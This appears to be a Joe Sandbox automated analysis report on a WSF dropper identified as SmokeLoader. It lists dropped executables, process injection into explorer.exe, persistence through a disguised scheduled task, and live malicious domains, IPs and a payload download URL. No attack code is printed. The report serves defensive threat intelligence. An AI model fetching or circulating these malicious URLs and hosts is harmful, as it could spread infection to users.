signatures13 57 Antivirus detection for dropped file 25->57 59 Multi AV Scanner detection for dropped file 25->59 61 Detected unpacking (changes PE section rights) 25->61 63 8 other signatures 25->63 28 explorer.exe 30 2 25->28 injected process14 dnsIp15 45 ceoconstractionstore.pl 188.40.141.211, 49747, 80 HETZNER-ASDE Germany 28->45 35 C:\Users\user\AppData\Roaming\fbhbvci, PE32 28->35 dropped 81 System process connects to network (likely due to code injection or exploit) 28->81 83 Benign windows process drops PE files 28->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->85 file16 signatures17

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        UkHkCa3IYV.wsf26%ReversingLabsWin32.Trojan.Leonem
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\fbhbvci100%AviraHEUR/AGEN.1312567
        C:\Users\user\AppData\Local\Temp\oBuf.exe100%AviraHEUR/AGEN.1312567
        C:\Users\user\AppData\Roaming\fbhbvci100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\oBuf.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\oBuf.exe88%ReversingLabsWin32.Trojan.SmokeLoader
        C:\Users\user\AppData\Roaming\fbhbvci88%ReversingLabsWin32.Trojan.SmokeLoader
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
        https://powerpoint.office.comcember0%URL Reputationsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://excel.office.com0%URL Reputationsafe
        http://schemas.micro0%URL Reputationsafe
        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        https://word.office.com0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        https://android.notify.windows.com/iOS0%URL Reputationsafe
        https://api.msn.com/0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        bestmagazineforanimalsunicum.ru
        193.46.217.78
        truetrue
          unknown
          ceoconstractionstore.pl
          188.40.141.211
          truetrue
            unknown
            unicexpertmagazine.pw
            193.46.217.78
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://openclehardware.ru/index.phptrue
                unknown
                http://bestmagazineforanimalsunicum.ru/download/svc.exetrue
                  unknown
                  http://ceoconstractionstore.pl/index.phptrue
                    unknown
                    http://informcoopirationunicolceo.ru/index.phptrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        http://bestmagazineforanimalsunicum.ru/download/svc.exeOpowershell.exe, 00000003.00000002.1932207758.00000232753A7000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://schemas.miexplorer.exe, 00000008.00000000.1985473351.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2955712554.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://powerpoint.office.comcemberexplorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://excel.office.comexplorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.microexplorer.exe, 00000008.00000000.1979216492.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1979620182.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.2952007827.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://ceoconstractionstore.pl/explorer.exe, 00000008.00000002.2954011281.000000000C557000.00000004.00000001.00020000.00000000.sdmptrue
                                      unknown
                                      http://bestmagazineforanimalsunicum.ru/download/svc.exengsTOpowershell.exe, 00000003.00000002.1932207758.0000023275360000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://api.msn.com/qexplorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contoso.com/powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1914266779.00000232101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.00000232016BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://ceoconstractionstore.pl/index.phpplexplorer.exe, 00000008.00000002.2954011281.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000008.00000000.1983343701.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1874377114.0000023200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://ceoconstractionstore.pl/Mexplorer.exe, 00000008.00000002.2954011281.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://gqhcklmysxvvdkln.com/explorer.exe, 00000008.00000002.2955751786.000000000CA8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://wns.windows.com/Lexplorer.exe, 00000008.00000000.1983343701.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1914266779.00000232101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.00000232016BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://word.office.comexplorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://go.micropowershell.exe, 00000003.00000002.1874377114.0000023200C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1914266779.000002321007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://schemas.micrexplorer.exe, 00000008.00000000.1985473351.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2955712554.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1874377114.000002320022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://aka.ms/Vh5j3kexplorer.exe, 00000008.00000000.1978252250.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://bestmagazineforanimalsunicum.rupowershell.exe, 00000003.00000002.1874377114.000002320161C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.000002320134F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1874377114.0000023201617000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000008.00000000.1980163122.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000008.00000000.1978252250.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://api.msn.com/explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1874377114.0000023200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://outlook.com_explorer.exe, 00000008.00000002.2954011281.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1983343701.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000008.00000000.1978252250.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                188.40.141.211
                                                                                                                ceoconstractionstore.plGermany
                                                                                                                24940HETZNER-ASDEtrue
                                                                                                                193.46.217.78
                                                                                                                bestmagazineforanimalsunicum.ruSpain
                                                                                                                203178CUBENODEEStrue
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1525801
                                                                                                                Start date and time:2024-10-04 16:34:38 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 37s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:10
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:UkHkCa3IYV.wsf
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543.wsf
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.expl.evad.winWSF@9/6@3/2
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 75%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 69
                                                                                                                • Number of non-executed functions: 14
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .wsf
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2472 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: UkHkCa3IYV.wsf
                                                                                                                TimeTypeDescription
                                                                                                                10:35:34API Interceptor47x Sleep call for process: powershell.exe modified
                                                                                                                10:36:00API Interceptor844x Sleep call for process: explorer.exe modified
                                                                                                                15:36:19Task SchedulerRun new task: Firefox Default Browser Agent B7986F81A9A9A792 path: C:\Users\user\AppData\Roaming\fbhbvci
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                188.40.141.2113312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • ceoconstractionstore.pl/index.php
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • ceoconstractionstore.pl/index.php
                                                                                                                abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                                                                                • gmpeople.com/upload/
                                                                                                                vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                setup.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • agressivemnaiq.xyz/
                                                                                                                A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                                                • host-data-coin-11.com/
                                                                                                                be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • host-data-coin-11.com/
                                                                                                                193.46.217.783312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • unicexpertmagazine.pw/index.php
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • unicexpertmagazine.pw/index.php
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                unicexpertmagazine.pw3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 185.219.7.204
                                                                                                                3312.PDF.scrGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 45.143.201.14
                                                                                                                bestmagazineforanimalsunicum.ru3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                ceoconstractionstore.pl3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                HETZNER-ASDE3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                                • 85.10.195.17
                                                                                                                https://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                                                                                • 49.12.228.110
                                                                                                                https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 49.12.228.110
                                                                                                                Zxooek.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 88.198.46.204
                                                                                                                MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 144.76.53.154
                                                                                                                Full Litigation File.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 176.9.171.101
                                                                                                                file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                • 49.12.197.9
                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                • 49.12.197.9
                                                                                                                CUBENODEES3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
